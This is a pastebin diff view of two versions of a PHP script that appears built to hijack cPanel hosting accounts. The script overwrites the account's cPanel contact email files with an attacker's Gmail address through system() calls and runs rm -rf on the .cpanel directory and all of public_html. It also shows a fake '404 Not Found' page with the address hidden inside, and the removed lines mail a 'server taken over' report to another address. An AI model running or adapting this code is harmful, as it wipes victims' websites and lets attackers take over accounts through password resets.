View difference between Paste ID: 9JiYawQn and 6yHrkLQN
SHOW: | | - or go back to the newest paste.
1
<?php
2
set_time_limit(0);
3-
$filt =  __file__ ;
3+
4
##############################
5
// $filt = getcwd();
6
// $filt = shell_exec('pwd');
7
 $filt =  __file__ ;
8
// $filt = php_uname();
9
##############################
10
$fuck = explode("/",$filt);
11-
$email666 = 'mobodigital.id@gmail.com';
11+
12
$_7mar = $fuck[1];
13-
$msg = "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['REQUEST_URI']." files was not found on this server.</p><h2 hidden>bioskopcgv@gmail.com</h2><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle ".$user." the request.</p>";
13+
14-
$msg2 = "Laporan Gan ".$azzouz. " dengan user ".$user." Telah Diambil Alih Dengan Identifikasi Server " .$azerty." Terima kasih";
14+
15
$sexterss = $azerty.$abcd;
16-
mail($email666,$azzouz,$msg2);
16+
17
//$email666 = 'ggggggggggggggggggg'; //after
18-
#############>/*
18+
$email666 = 'bioskopcgv@gmail.com'; //befor
19-
$f = fopen("/".$_7mar."/".$user.'/.cpanel/contactinfo', 'w');fwrite($f, $wr);fclose($f);
19+
system("user=$(whoami) ; rm -rf /$_7mar/$user/.cpanel/ ; cd /$_7mar/$user/ ; rm .contactinfo ; echo 'email:$email666' >> .contactinfo ;");
20-
$f = fopen("/".$_7mar."/".$user.'/.contactinfo', 'w');fwrite($f, $wr); fclose($f);
20+
system("user=$(whoami) ; rm -rf /$_7mar/$user/.cpanel/ ; cd /$_7mar/$user/ ; rm .contactemail ; echo '$email666' >> .contactemail ;");
21-
#############>*/
21+
22-
if(isset($_GET['user'])){echo "<br><br><font color='red'>$user</font><br><br>";}
22+
$msg = "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['REQUEST_URI']." files was not found on this server.</p><h2 hidden>bioskopcgv@gmail.com</h2><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>";
23-
if(isset($_GET['rename'])){
23+
24-
rename("/$_7mar/$user/.cpanel/","/$_7mar/$user/7mar");
24+
system("rm -rf /$_7mar/$user/public_html/*");
25-
echo "<br><br><font color='red'>$user</font><br><br>";
25+
26-
}
26+
echo $_SERVER['HTTP_HOST']."|".$user."|";
27
28
29
30
?>